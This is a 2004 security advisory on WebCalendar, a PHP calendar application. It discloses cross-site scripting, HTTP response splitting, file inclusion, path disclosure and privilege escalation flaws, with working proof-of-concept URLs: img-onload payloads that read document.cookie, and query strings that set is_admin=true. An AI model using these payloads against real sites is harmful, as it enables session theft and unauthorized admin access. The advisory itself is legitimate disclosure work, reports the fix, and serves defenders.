webcalendar.txt

2004-11-12T00:00:00
ID PACKETSTORM:35001
Type packetstorm
Reporter Joxean Koret
Modified 2004-11-12T00:00:00

Description

                                        
                                            `  
  
---------------------------------------------------------------------------   
Multiple Vulnerabilities in WebCalendar   
---------------------------------------------------------------------------   
  
Author: Jose Antonio Coret (Joxean Koret)   
Date: 2004   
Location: Basque Country   
  
---------------------------------------------------------------------------   
  
Affected software description:   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~   
  
WebCalendar - Web Calendar Application   
  
WebCalendar is a PHP application used to   
maintain a calendar for a single user   
or an intranet group of users. It can also be   
configured as an event calendar.   
  
Web : http://webcalendar.sourceforge.net   
  
---------------------------------------------------------------------------   
  
Vulnerabilities:   
~~~~~~~~~~~~~~~~   
  
A. Cross Site Scripting Vulnerabilities in various   
scripts.   
  
A1. WebCalendar check the <script>any</script>   
format of XSS attacks but   
doesn't check <img src based attacks. To test the   
vulnerabilities you can try   
the following POCs:   
  
  
http://<site-with-webcalendar>/demo/view_entry.php?id=41972"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&date=20041001   
  
http://<site-with-webcalendar>/demo/view_d.php?id=657"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)%20height=0%20width=0>&date=20041009   
  
http://<site-with-webcalendar>/demo/usersel.php?form=editentryform.elements[20];  
%0d%0aalert(document.cookie);//&listid=20&users=demo,demo1,demo2   
  
http://<site-with-webcalendar>/demo/datesel.php?form=editentryform.elements[20].rpt_day.selectedIndex%20=%20day%20-%201;alert(document.cookie);//"><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>&fday=rpt_day&fmonth=rpt_month&fyear=rpt_year&date=20041001   
  
http://<site-with-webcalendar>/demo/datesel.php?form=editentryform&fday=rpt_day"%20onclick=javascript:alert(document.cookie)>&fmonth=rpt_month&fyear=rpt_year&date=20041001   
  
http://<site-with-webcalendar>/demo/includes/trailer.php?user="><img%20src=http://images.sourceforge.net/images/head_bg_new.gif%20onload=javascript:alert(document.cookie)>   
  
http://<site-with-webcalendar>/demo/includes/styles.php?FONTS=asdf}%0A--></style><script>alert(document.cookie)</script>   
NOTE: Almost any GLOBAL parameter in this script   
is vulnerable   
  
  
B. HTTP Response Splitting Error   
  
B1. Due to a poor input validation in the script   
login.php HTTP Response Splitting   
attacks are possible. You can try the vulnerability   
with the following POC :   
  
http://<site-with-webcalendar>/demo/login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0a%0d%0dContent-Type:text/html%0d%0aContent-Length:9%0d%0aHi   
to all   
  
  
C. Possible code execution   
  
C1. If an attacker is abble to upload a file via ftp or   
other system to the web directory   
there is a flaw that allows to execute any file in the   
web tree. To try the vulnerability   
you can try this url :   
  
http://<site-with-webcalendar>/demo/includes/init.php?user_inc=the_file_that_you_upload_via_ftp_or_other   
  
Note: Almost this is a full path disclosure.   
  
D. Full Path Disclosure   
  
D1. Because of a poor validation of the parameter   
enconded_login in the PHP script   
validate.php, there is a vulnerability that shows   
the full path of the script in the   
web server.   
  
http://<site-with-webcalendar>/demo/includes/validate.php?encoded_login=   
(Full Path Disclosure)   
  
E. Admin Privileges   
  
E1. To make various actions you need to be the   
administrator of the webcalendar   
application but various scripts are vulnerable to   
Variable Poisoning attacks.   
Privilege escalation is possible using the following   
methods :   
  
  
Example 1 :   
  
You doesn't have permission:   
  
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true   
  
But using it yes:   
  
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true   
  
Example 2 :   
  
http://<site-with-webcalendar>/demo/view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true&id=   
  
Example 3 :   
  
No permission ->   
http://webcalendar.sourceforge.net/demo/upcoming.php   
Permission Granted :) ->   
http://webcalendar.sourceforge.net/demo/upcoming.php?public_must_be_enabled=true&public_access=Y   
  
Notes   
~~~~~   
  
The poor method that uses to protect against XSS   
attacks in the script functions.php   
is the following :   
  
// This code is a temporary hack to make the   
application work when   
// register_globals is set to Off in php.ini (the   
default setting in   
// PHP 4.2.0 and after).   
if ( ! empty ( $HTTP_GET_VARS ) ) {   
while (list($key, $val) =   
@each($HTTP_GET_VARS)) {   
// don't allow anything to have <script> in it...   
if ( ! is_array ( $val ) ) {   
if ( preg_match ( "/<\s*script/i", $val ) ) {   
echo "Security violation!"; exit;   
}   
}   
  
Is very easy to by pass these basic security checks   
by using Unicode encoded strings,   
or using any other valid XSS attack, such as <img   
src attacks.   
  
More Notes   
~~~~~~~~~~   
  
The developers (in special Jeff Hoover) of   
WebCalendar has been demostrated   
seriousness with the fixes and responses about   
these errors.   
  
The fix:   
~~~~~~~~   
  
The problems has been fixed in the CVS repository.   
  
Disclaimer:   
~~~~~~~~~~~   
  
The information in this advisory and any of its   
demonstrations is provided   
"as is" without any warranty of any kind.   
  
I am not liable for any direct or indirect damages   
caused as a result of   
using the information or demonstrations provided   
in any part of this   
advisory.   
  
---------------------------------------------------------------------------   
  
Contact:   
~~~~~~~~   
  
Joxean Koret at   
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es   
  
  
  
`